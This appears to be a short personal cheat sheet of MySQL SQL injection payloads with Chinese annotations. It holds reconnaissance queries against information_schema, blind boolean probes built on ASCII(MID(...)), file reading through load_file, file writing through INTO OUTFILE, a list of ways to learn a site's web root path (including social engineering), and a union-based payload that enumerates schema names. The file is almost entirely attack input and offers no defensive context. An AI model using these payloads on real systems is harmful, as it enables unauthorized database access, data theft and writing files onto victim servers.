select length(id) from ot_picture LIMIT 1
select database(),user(),VERSION(),@@version_compile_os;
select TABLE_NAME from information_schema.`TABLES` where TABLE_SCHEMA='xinghui'
select
(select top 1 asc(mid(列名,位数,1)) from admin)=97
SELECT ASCII(MID(id,1,1)) from ot_picture LIMIT 1
SELECT MID(id,1,1) from ot_picture LIMIT 1
select user() ;
//文件读取
select load_file('D:/text.txt');
//文件写入
select 'aa',1,2 into outfile 'd:/text.txt'
SELECT ASCII('a')
SELECT MID('NowaMagic', 1, 2)
select * from ot_ucenter_member where id=6171
select * from ot_coin where id=8122 and (SELECT ASCII(MID(id,1,1)) from ot_picture LIMIT 1) =49
获取网站路径方法
1.报错显示
2.漏洞报错
3.遗留文件
4.读取配置文件
5.社工
union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from
`information_schema`.schemata limit
13,1),0x31303235343830303536,0x31303235343830303536